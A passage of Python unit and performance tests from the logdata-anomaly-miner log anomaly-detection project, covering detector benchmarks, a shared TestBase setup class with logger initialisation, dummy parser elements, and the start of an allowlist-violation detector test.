(new_match_path_detector.__class__.__name__, number_of_paths)) def run_event_type_detector(self, number_of_paths): """Run the performance tests for EventTypeDetector.""" with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 data = uni_data_list + nor_data_list + beta1_data_list + uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\ nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\ + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: path_list = None if number_of_paths is not None and number_of_paths != 1000000: path_list = ['/integer/d' + str(i) for i in range(number_of_paths)] else: number_of_paths = 1000000 event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths)) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(data[i % len(data)]).encode()) match_element = any_byte_data_me.get_match_element('/integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector) measured_time += timeit.timeit(lambda: event_type_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations if number_of_paths == 1000000: number_of_paths = 'all' type(self).result = self.result + self.result_string % ( event_type_detector.__class__.__name__, avg, results, '%s different path(es).' % (str(number_of_paths))) def run_variable_type_detector(self, number_of_paths): """Run the performance tests for VariableTypeDetector.""" with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 data = uni_data_list + nor_data_list + beta1_data_list + uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\ nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\ + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: path_list = None if number_of_paths is not None and number_of_paths != 1000000: path_list = ['/integer/d' + str(i) for i in range(number_of_paths)] else: number_of_paths = 1000000 event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list) variable_type_detector = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], event_type_detector, target_path_list=path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths)) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(data[i % len(data)]).encode()) match_element = any_byte_data_me.get_match_element('/integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector) self.assertTrue(event_type_detector.receive_atom(log_atom)) measured_time += timeit.timeit(lambda: variable_type_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations if number_of_paths == 1000000: number_of_paths = 'all' type(self).result = self.result + self.result_string % ( variable_type_detector.__class__.__name__, avg, results, '%s different path(es).' % (str(number_of_paths))) def run_variable_correlation_detector(self, number_of_paths): """Run the performance tests for VariableCorrelationDetector.""" with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f) # skipcq: BAN-B301 data = uni_data_list + nor_data_list + beta1_data_list + uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\ nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\ + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: path_list = None if number_of_paths is not None and number_of_paths != 1000000: path_list = ['/integer/d' + str(i) for i in range(number_of_paths)] else: number_of_paths = 1000000 event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list) variable_correlation_detector = VariableCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], event_type_detector) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths)) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(data[i % len(data)]).encode()) match_element = any_byte_data_me.get_match_element('/integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector) self.assertTrue(event_type_detector.receive_atom(log_atom)) measured_time += timeit.timeit(lambda: variable_correlation_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations if number_of_paths == 1000000: number_of_paths = 'all' type(self).result = self.result + self.result_string % ( variable_correlation_detector.__class__.__name__, avg, results, '%s different path(es).' % (str(number_of_paths))) def run_event_frequency_detector(self, number_of_paths): """Run the performance tests for EventFrequencyDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) target_path_list = None if number_of_paths is not None: target_path_list = ['d' + str(i) for i in range(number_of_paths)] efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=target_path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: if number_of_paths is None: path = 'd' + str(i) else: path = 'd' + str(i % number_of_paths) decimal_integer_value_me = DecimalIntegerValueModelElement( path, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, efd) measured_time += timeit.timeit(lambda: efd.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( efd.__class__.__name__, avg, results, 'a %s and %s different path(es).' % (new_match_path_detector.__class__.__name__, str(number_of_paths))) def run_event_sequence_detector(self, number_of_paths): """Run the performance tests for EventFrequencyDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) id_path_list = None if number_of_paths is not None: id_path_list = ['d' + str(i) for i in range(number_of_paths)] esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=id_path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: if number_of_paths is None: path = 'd' + str(i) else: path = 'd' + str(i % number_of_paths) decimal_integer_value_me = DecimalIntegerValueModelElement( path, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, esd) measured_time += timeit.timeit(lambda: esd.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( esd.__class__.__name__, avg, results, 'a %s and %s different path(es).' % (new_match_path_detector.__class__.__name__, str(number_of_paths))) def test01atom_filters(self): """Start performance tests for AtomFilters.""" self.run_atom_filters_match_path_filter(1) self.run_atom_filters_match_path_filter(30) self.run_atom_filters_match_path_filter(100) self.run_atom_filters_match_value_filter(1) self.run_atom_filters_match_value_filter(30) self.run_atom_filters_match_value_filter(100) def test02enhanced_new_match_path_value_combo_detector(self): """Start performance tests for EnhancedNewMatchPathValueComboDetector.""" self.run_enhanced_new_match_path_value_combo_detector(1) self.run_enhanced_new_match_path_value_combo_detector(30) self.run_enhanced_new_match_path_value_combo_detector(100) def test03histogram_analysis(self): """Start performance tests for HistogramAnalysis.""" self.run_histogram_analysis(1, 100) self.run_histogram_analysis(30, 100) self.run_histogram_analysis(100, 100) self.run_histogram_analysis(10000, 100) self.run_histogram_analysis(1, 1000) self.run_histogram_analysis(30, 1000) self.run_histogram_analysis(100, 1000) self.run_histogram_analysis(10000, 1000) self.run_histogram_analysis(1, 10000) self.run_histogram_analysis(30, 10000) self.run_histogram_analysis(100, 10000) self.run_histogram_analysis(10000, 10000) def test04match_value_average_change_detector(self): """Start performance tests for MatchValueAverageChangeDetector.""" self.run_match_value_average_change_detector(1) self.run_match_value_average_change_detector(30) self.run_match_value_average_change_detector(100) def test05match_value_stream_writer(self): """Start performance tests for MatchValueStreamWriter.""" self.run_match_value_stream_writer(1) self.run_match_value_stream_writer(30) self.run_match_value_stream_writer(100) def test06missing_match_path_value_detector(self): """Start performance tests for MissingMatchPathValueDetector.""" self.run_missing_match_path_value_detector(1) self.run_missing_match_path_value_detector(30) self.run_missing_match_path_value_detector(100) def test07new_match_path_detector(self): """Start performance tests for NewMatchPathDetector.""" self.run_new_match_path_detector(1) self.run_new_match_path_detector(1000) self.run_new_match_path_detector(100000) def test08new_match_path_value_combo_detector(self): """Start performance tests for NewMatchPathValueComboDetector.""" self.run_new_match_path_value_combo_detector(1) self.run_new_match_path_value_combo_detector(30) self.run_new_match_path_value_combo_detector(100) def test09new_match_path_value_detector(self): """Start performance tests for NewMatchPathValueDetector.""" self.run_new_match_path_value_detector(1) self.run_new_match_path_value_detector(30) self.run_new_match_path_value_detector(100) def test10time_correlation_detector(self): """Start performance tests for TimeCorrelationDetector.""" self.run_time_correlation_detector(10) self.run_time_correlation_detector(100) self.run_time_correlation_detector(1000) def test11time_correlation_violation_detector(self): """Start performance tests for TimeCorrelationViolationDetector.""" self.run_time_correlation_violation_detector(0.99) self.run_time_correlation_violation_detector(0.95) self.run_time_correlation_violation_detector(0.50) self.run_time_correlation_violation_detector(0.01) def test12timestamp_correction_filters(self): """Start performance tests for TimestampCorrectionFilters.""" self.run_timestamp_correction_filters(1) self.run_timestamp_correction_filters(1000) self.run_timestamp_correction_filters(100000) def test13timestamps_unsorted_detector(self): """Start performance tests for TimestampsUnsortedDetector.""" self.run_timestamps_unsorted_detector(0.001) self.run_timestamps_unsorted_detector(0.1) self.run_timestamps_unsorted_detector(1) self.run_timestamps_unsorted_detector(100) def test14allowlist_violation_detector(self): """Start performance tests for AllowlistViolationDetector.""" self.run_allowlist_violation_detector(1, 99) self.run_allowlist_violation_detector(1, 50) self.run_allowlist_violation_detector(1, 1) self.run_allowlist_violation_detector(1000, 99) self.run_allowlist_violation_detector(1000, 50) self.run_allowlist_violation_detector(1000, 1) self.run_allowlist_violation_detector(100000, 99) self.run_allowlist_violation_detector(100000, 50) self.run_allowlist_violation_detector(100000, 1) def test15new_match_id_value_combo_detector(self): """Start performance tests for NewMatchIdValueComboDetector.""" self.run_new_match_id_value_combo_detector(0.1) self.run_new_match_id_value_combo_detector(5) self.run_new_match_id_value_combo_detector(20) self.run_new_match_id_value_combo_detector(100) def test16parser_count(self): """Start performance tests for ParserCount.""" # use path self.run_parser_count(True, 60) self.run_parser_count(True, 1000) self.run_parser_count(True, 10000) self.run_parser_count(True, 100000) # use no path self.run_parser_count(False, 60) self.run_parser_count(False, 1000) self.run_parser_count(False, 10000) self.run_parser_count(False, 100000) def test17event_correlation_detector(self): """Start performance tests for EventCorrelationDetector.""" self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(0.5, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(0.1, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 10, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 1, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 0.1, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 1.0, 0.01, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.7, 0.1, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 2000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 10000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 1000, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 2000, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 10, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 100, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 60, 90) self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 30, 45) def test18match_filter(self): """Start performance tests for MatchFilter.""" self.run_match_filter(1) self.run_match_filter(1000) self.run_match_filter(100000) def test19event_type_detector(self): """Start performance tests for EventTypeDetector.""" self.run_event_type_detector(None) self.run_event_type_detector(1) self.run_event_type_detector(10) self.run_event_type_detector(100) def test20variable_type_detector(self): """Start performance tests for VariableTypeDetector.""" self.run_variable_type_detector(None) self.run_variable_type_detector(1) self.run_variable_type_detector(10) self.run_variable_type_detector(100) def test21variable_correlation_detector(self): """Start performance tests for VariableCorrelationDetector.""" # The VCD should never been run without restrictions of paths (in ETD or via ignore_list, constraint_list) as the performance is # terrible. # self.run_variable_correlation_detector(None) self.run_variable_correlation_detector(1) self.run_variable_correlation_detector(10) self.run_variable_correlation_detector(100) def test22event_frequency_detector(self): """Start performance tests for EventFrequencyDetector.""" self.run_event_frequency_detector(None) self.run_event_frequency_detector(1) self.run_event_frequency_detector(10) self.run_event_frequency_detector(100) def test23event_frequency_detector(self): """Start performance tests for EventSequenceDetector.""" self.run_event_sequence_detector(1) self.run_event_sequence_detector(10) self.run_event_sequence_detector(100) if __name__ == '__main__': unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/TestBase.py000066400000000000000000000271671437606560100240650ustar00rootroot00000000000000import unittest import os import shutil import logging import sys import errno import inspect from aminer.AminerConfig import KEY_LOG_DIR, DEFAULT_LOG_DIR, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, DEBUG_LOG_NAME,\ KEY_REMOTE_CONTROL_LOG_FILE, KEY_STAT_LOG_FILE, KEY_DEBUG_LOG_FILE, REMOTE_CONTROL_LOG_NAME, DEFAULT_REMOTE_CONTROL_LOG_FILE,\ STAT_LOG_NAME, DEFAULT_STAT_LOG_FILE, DEBUG_LEVEL, load_config, build_persistence_file_name, DEFAULT_DEBUG_LOG_FILE from aminer.AnalysisChild import AnalysisContext from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement from aminer.util import PersistenceUtil from aminer.util import SecureOSFunctions from _io import StringIO def initialize_loggers(aminer_config, aminer_user_id, aminer_grp_id): """Initialize all loggers.""" datefmt = '%d/%b/%Y:%H:%M:%S %z' log_dir = aminer_config.config_properties.get(KEY_LOG_DIR, DEFAULT_LOG_DIR) if log_dir == DEFAULT_LOG_DIR: try: if not os.path.isdir(log_dir): persistence_dir_path = aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir_path) if SecureOSFunctions.base_dir_path == DEFAULT_PERSISTENCE_DIR: relative_path_log_dir = os.path.split(DEFAULT_LOG_DIR)[1] os.mkdir(relative_path_log_dir, dir_fd=persistence_dir_fd) os.chown(relative_path_log_dir, aminer_user_id, aminer_grp_id, dir_fd=persistence_dir_fd, follow_symlinks=False) except OSError as e: if e.errno != errno.EEXIST: msg = 'Unable to create log-directory: %s' % log_dir else: msg = e logging.getLogger(DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) tmp_value = aminer_config.config_properties.get(KEY_REMOTE_CONTROL_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print('%s attribute must not contain a full directory path, but only the filename.' % KEY_REMOTE_CONTROL_LOG_FILE, file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(KEY_STAT_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print('%s attribute must not contain a full directory path, but only the filename.' % KEY_STAT_LOG_FILE, file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(KEY_DEBUG_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print('%s attribute must not contain a full directory path, but only the filename.' % KEY_DEBUG_LOG_FILE, file=sys.stderr) sys.exit(1) log_dir_fd = SecureOSFunctions.secure_open_log_directory(log_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME) rc_logger.setLevel(logging.DEBUG) remote_control_log_file = aminer_config.config_properties.get( KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, DEFAULT_REMOTE_CONTROL_LOG_FILE)) if not remote_control_log_file.startswith(log_dir): remote_control_log_file = os.path.join(log_dir, remote_control_log_file) try: rc_file_handler = logging.FileHandler(remote_control_log_file) os.chown(remote_control_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print('Could not create or open %s: %s. Stopping..' % (remote_control_log_file, e), file=sys.stderr) sys.exit(1) rc_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) rc_logger.addHandler(rc_file_handler) logging.addLevelName(15, "REMOTECONTROL") stat_logger = logging.getLogger(STAT_LOG_NAME) stat_logger.setLevel(logging.INFO) stat_log_file = aminer_config.config_properties.get(KEY_STAT_LOG_FILE, os.path.join(log_dir, DEFAULT_STAT_LOG_FILE)) if not stat_log_file.startswith(log_dir): stat_log_file = os.path.join(log_dir, stat_log_file) try: stat_file_handler = logging.FileHandler(stat_log_file) os.chown(stat_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print('Could not create or open %s: %s. Stopping..' % (stat_log_file, e), file=sys.stderr) sys.exit(1) stat_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(message)s', datefmt=datefmt)) stat_logger.addHandler(stat_file_handler) debug_logger = logging.getLogger(DEBUG_LOG_NAME) if DEBUG_LEVEL == 0: debug_logger.setLevel(logging.ERROR) elif DEBUG_LEVEL == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) debug_log_file = aminer_config.config_properties.get( KEY_DEBUG_LOG_FILE, os.path.join(log_dir, DEFAULT_DEBUG_LOG_FILE)) if not debug_log_file.startswith(log_dir): debug_log_file = os.path.join(log_dir, debug_log_file) try: debug_file_handler = logging.FileHandler(debug_log_file) os.chown(debug_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print('Could not create or open %s: %s. Stopping..' % (debug_log_file, e), file=sys.stderr) sys.exit(1) debug_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) debug_logger.addHandler(debug_file_handler) # skipcq: PTC-W0046 class TestBase(unittest.TestCase): """This is the base class for all unittests.""" def get_config_file_path(self): """ Get the module name to choose the right config file for parallel execution. Example: logdata-anomaly-miner/aecid-testsuite/unit/analysis/AtomFiltersTest.py - we want to know the directory analysis. """ return os.getcwd()+'/unit/data/parallel_configs/%s_config.py' % inspect.getmodule(self).__file__.split("unit/")[1].split("/")[0] def setUp(self): """Set up all needed variables and remove persisted data.""" PersistenceUtil.persistable_components = [] self.aminer_config = load_config(self.get_config_file_path()) self.analysis_context = AnalysisContext(self.aminer_config) self.output_stream = StringIO() self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream) persistence_dir_name = build_persistence_file_name(self.aminer_config) if os.path.exists(persistence_dir_name): shutil.rmtree(persistence_dir_name) if not os.path.exists(persistence_dir_name): os.makedirs(persistence_dir_name) initialize_loggers(self.aminer_config, os.getuid(), os.getgid()) if isinstance(persistence_dir_name, str): persistence_dir_name = persistence_dir_name.encode() SecureOSFunctions.secure_open_base_directory(persistence_dir_name, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = True def tearDown(self): """Delete all persisted data after the tests.""" self.aminer_config = load_config(self.get_config_file_path()) persistence_file_name = build_persistence_file_name(self.aminer_config) if os.path.exists(persistence_file_name): shutil.rmtree(persistence_file_name) if not os.path.exists(persistence_file_name): os.makedirs(persistence_file_name) SecureOSFunctions.close_base_directory() def reset_output_stream(self): """Reset the output stream.""" self.output_stream.seek(0) self.output_stream.truncate(0) def compare_match_results(self, data, match_element, match_context, id_, path, match_string, match_object, children): """Compare the results of get_match_element() if match_element is not None.""" self.assertEqual(match_element.path, "%s/%s" % (path, id_)) self.assertEqual(match_element.match_string, match_string) self.assertEqual(match_element.match_object, match_object) if children is None: self.assertIsNone(match_element.children, children) else: self.assertEqual(len(children), len(match_element.children)) for i, child in enumerate(children): self.assertEqual(match_element.children[i].path, child.path) self.assertEqual(match_element.children[i].match_string, child.match_string) self.assertEqual(match_element.children[i].match_object, child.match_object) self.assertIsNone(match_element.children[i].children, children) self.assertEqual(match_context.match_string, match_string) self.assertEqual(match_context.match_data, data[len(match_string):]) def compare_no_match_results(self, data, match_element, match_context): """Compare the results of get_match_element() if match_element is not None.""" self.assertIsNone(match_element, None) self.assertEqual(match_context.match_data, data) class DummyMatchContext: """Dummy class for MatchContext.""" def __init__(self, match_data: bytes): """Initiate the Dummy class.""" self.match_data = match_data self.match_string = b'' def update(self, match_string: bytes): """Update the data.""" self.match_data = self.match_data[len(match_string):] self.match_string += match_string class DummyFixedDataModelElement(ModelElementInterface): """Dummy class for fixed string ModelElements.""" def __init__(self, element_id: str, data: bytes): self.element_id = element_id self.data = data def get_id(self): """Get the element ID.""" return self.element_id def get_child_elements(self): # skipcq: PYL-R0201 """ Get all possible child model elements of this element. @return None as there are no children of this element. """ return None def get_match_element(self, path: str, match_context): """@return None when there is no match, MatchElement otherwise.""" if not match_context.match_data.startswith(self.data): return None match_context.update(self.data) return MatchElement("%s/%s" % (path, self.element_id), self.data, self.data, None) class DummyFirstMatchModelElement(ModelElementInterface): """This class defines a model element to return the match from the the first matching child model within a given list.""" def __init__(self, element_id, children): self.element_id = element_id self.children = children if (children is None) or (None in children): msg = 'Invalid children list' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def get_id(self): """Get the element ID.""" return self.element_id def get_child_elements(self): """Get all possible child model elements of this element.""" return self.children def get_match_element(self, path, match_context): """@return None when there is no match, MatchElement otherwise.""" current_path = "%s/%s" % (path, self.element_id) match_data = match_context.match_data for child_element in self.children: child_match = child_element.get_match_element(current_path, match_context) if child_match is not None: return child_match match_context.match_data = match_data return None if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/__init__.py000066400000000000000000000000001437606560100240630ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/000077500000000000000000000000001437606560100236075ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/AllowlistViolationDetectorTest.py000066400000000000000000000055231437606560100323570ustar00rootroot00000000000000import unittest from aminer.analysis.Rules import PathExistsMatchRule from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from unit.TestBase import TestBase from datetime import datetime import time class AllowlistViolationDetectorTest(TestBase): """Unittests for the AllowlistViolationDetector.""" __expected_string = '%s No allowlisting for current atom\n%s: "%s" (%d lines)\n %s\n\n' fixed_string = b'fixed String' def test1match_found(self): """This test case checks if valid inputs are recognized.""" description = "Test1AllowlistViolationDetector" path_exists_match_rule = PathExistsMatchRule('match/s1', None) path_exists_match_rule2 = PathExistsMatchRule('match/s2', None) t = time.time() allowlist_violation_detector = AllowlistViolationDetector(self.aminer_config, [path_exists_match_rule, path_exists_match_rule2], [ self.stream_printer_event_handler], output_logline=False) self.analysis_context.register_component(allowlist_violation_detector, description) fixed_dme = FixedDataModelElement('s1', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, allowlist_violation_detector) self.assertTrue(allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') fixed_dme = FixedDataModelElement('s2', self.fixed_string) match_context = 